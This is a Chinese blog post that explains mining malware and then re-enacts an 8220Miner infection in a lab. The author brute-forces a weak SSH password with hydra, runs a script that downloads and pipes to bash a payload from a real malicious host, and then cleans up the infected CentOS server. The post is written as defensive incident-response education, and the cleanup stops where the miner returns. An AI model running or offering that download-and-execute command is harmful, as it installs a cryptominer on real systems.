文章插图
一、挖矿病毒的小科普挖矿病毒可以说是安全圈的“老熟人”了 , 各类安全事件一直不乏它们活跃的身影 。亚信安全发布的《2020年度安全威胁回顾及预测》显示:2020年 , 挖矿病毒持续活跃 , 不仅老病毒出现频繁更新 , 而且还出现了多个新型挖矿病毒 。其中 , 有隐藏在linux设备的计划任务中 , 通过定时任务的方式下载并执行挖矿程序和“海啸”后门程序 , 发动DDoS攻击;还有WMI无文件挖矿实现双平台感染;伪装成系统文件的XMRDoor挖矿病毒;以及利用“新冠病毒”邮件传播的“LemonDuck”无文件挖矿病毒 。
而进入2021年 , 针对发展中国家的挖矿病毒攻击更是呈上涨态势 。究其原因 , 如印度、泰国等国家在网络安全方面投入成本较低 , 人员安全意识比较薄弱 , 挖矿病毒攻击成功概率较高 。此外 , 制造业、政府、医疗、金融等行业依然是挖矿病毒的主要攻击目标
可以看一下这个科普小视频快速了解《什么是挖矿病毒》
视频来自:https://mp.weixin.qq.com/s/RuWx1KDvJSUby416KBnxmQ
2、本次中招的挖矿病毒为http://bash.givemexyz.in/xms dbused木马
处理过程参考了如下连接
https://zhuanlan.zhihu.com/p/376610910
https://cloud.tencent.com/developer/article/1853002
三、挖矿木马清理复盘为了复盘 , 我这里准备kali及测试服务器模拟挖矿病毒入侵及查杀清理的过程
本次中招的挖矿病毒为8220Miner挖矿病毒家族
病毒木马一般会利用高危漏洞和弱口令进行入侵
Kali 192.168.31.15
centos7.9 192.168.31.232
1、CentOS7服务器上存在弱口令系统账号admin模拟弱口令用户admin
文章插图
(图片可点击放大查看)
2、弱口令暴力破解hydra工具暴力破解admin用户弱密码就是admin
文章插图
(图片可点击放大查看)
3、Kali 机器上准备挖矿病毒
cat /opt/Miner_virus.sh#!/bin/bashcd /home/admin;(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||Python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
文章插图
(图片可点击放大查看)
4、接下来进行攻击入侵
ssh admin@192.168.31.232 < /opt/Miner_virus.sh输入弱口令admin
文章插图
(图片可点击放大查看)
等待脚本执行
文章插图
(图片可点击放大查看)
说明:当然挖矿病毒黑产团队的入侵手段肯定比我这种要高级太多
上面只是简单模拟
5、很快这台机器很快就中招了CPU100%
文章插图
(图片可点击放大查看)
可见弱口令被攻击的成本真的很低
6、接下进行应急响应查杀
ps -ef | grep dbusedll /proc/17743/exe可以看到/tmp目录下有不少恶意程序文件cd /tmpls -al
文章插图
(图片可点击放大查看)
7、先改掉弱密码 , 杀掉进程
passwd adminkill -9 PID
文章插图
(图片可点击放大查看)
8、删掉恶意程序文件
cd /tmpls -alrm -rf bashirc dbused .lock .pwn .python
文章插图
(图片可点击放大查看)
文章插图
(图片可点击放大查看)
9、别太乐观你以为就完事了 , 不 , 你错了 , 人家也不是吃素的
隔一会top查看CPU又100%了
推荐阅读
- 一百次感动比不上一次心动下一句?一百次感动比不上一次心动怎么回复
- 三毛的每想你一次,天上飘落一粒沙是哪本书?想你一次天上就掉一粒沙 于是形成撒哈拉
- 计算机病毒传染的一般过程是怎样的
- 不会放过你重生,一朝重生,重回定亲之日,这一次她定不会再放开他的手-
- 一次包络和二次包络区别 二次包络原理
- 腾讯游戏多久可以改一次实名认证?
- 记一次springmvc设置aop切面失败到解决
- 2020年工伤一次性补助赔偿标准表 2020年工伤死亡一次性补助金标准
- 鸡胗皮磨粉一次吃多少
- 中学生应该怎样做才能远离病毒?